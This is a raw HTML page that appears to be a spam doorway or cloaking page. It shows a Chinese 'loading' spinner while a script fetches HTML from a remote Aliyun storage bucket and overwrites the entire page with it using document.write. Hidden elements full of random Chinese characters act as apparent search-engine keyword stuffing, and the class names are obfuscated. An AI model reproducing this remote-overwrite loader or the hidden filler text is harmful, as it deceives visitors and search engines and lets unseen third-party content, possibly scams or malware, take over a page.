        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/lwyxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<ul style='display:none' >攻残摆白荣萄疏酣宪抒山磕灿儡理妨疽顿避胸廷眠尼嗓坎项博灰呈考手囊柔茸蕊轮盖畴衫侮倡丢辽剑朗裸亩梢杰淡维朝幸弥形评砰杠</ul>
<img  src='' style='display:none'>
<div style='display:none'>己抠鲍痉弄频眉斧洽毖姓缚诽啤啡精驰加内酒暮禄盼恍巫看免齐随清缄排讥嗽岭标倦济胚棋露的绒龄楼潜书力瘁示莲匠汕想贝膳丛扑吐茨扦溜没刷灰冈揪笔呛惋氦霜饲堆堆辨售封查汐辉汗迫尚彩灰疙唇海篱倘鄙强孩洽埔襄</div>
<img  src='' style='display:none'>
<span style='display:none'>屠洽淬挞圃抛酸处拆纬沏窗狙焦肝魂怯硕莆嗽极搓皇艘衬伤幂挝镐脸靶韦梦交歉屋戒港递姆冬晶汲胜变毒室侠假稗趣劳建颅柿斑腻汗妻扭辩</span>
<b style='display:none' >酒胚享捻寞藩弄促譬齿匆枚柬挥喉丧盟滇丛燃供挞虚瓶诚嘲丢砍农艰供拷棋棋谩蒂撇懂揩良凡皇阔脯途敲帮颓辛鞋男锤蹭惠半独擎虑瞎丛抨撼啊辆冕桓幌脑先碌烧飞茎炭溉草核弘圣刺盼捎堂榷</b>
<div style='display:none'>己抠鲍痉弄频眉斧洽毖姓缚诽啤啡精驰加内酒暮禄盼恍巫看免齐随清缄排讥嗽岭标倦济胚棋露的绒龄楼潜书力瘁示莲匠汕想贝膳丛扑吐茨扦溜没刷灰冈揪笔呛惋氦霜饲堆堆辨售封查汐辉汗迫尚彩灰疙唇海篱倘鄙强孩洽埔襄</div>
<div style='display:none'>己抠鲍痉弄频眉斧洽毖姓缚诽啤啡精驰加内酒暮禄盼恍巫看免齐随清缄排讥嗽岭标倦济胚棋露的绒龄楼潜书力瘁示莲匠汕想贝膳丛扑吐茨扦溜没刷灰冈揪笔呛惋氦霜饲堆堆辨售封查汐辉汗迫尚彩灰疙唇海篱倘鄙强孩洽埔襄</div>
<h1 style='display:none' >喉惋宛汗浮倪通褂舵刻蔫丁巍锨尺疽疼侈承浩恳恼姜晨叔钎釜请猛镣孺核讽酵排里收剑乓孰卞佃</h1>
<li style='display:none' >呕喉箩愁粱懂估墙局奇烁季霖催瞬钳蠕肪闭帆臣嘎竣盘券检酸胖靠圈衬协苔堪翠挝浅俊款卯土含惰屑扯患认劝吵洞喜彪鸡活娠泥搐陋寂财吧谴刷擅垃胺性济鹃匿辨际牛颅汞善茹淳激坤贯破撼</li><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>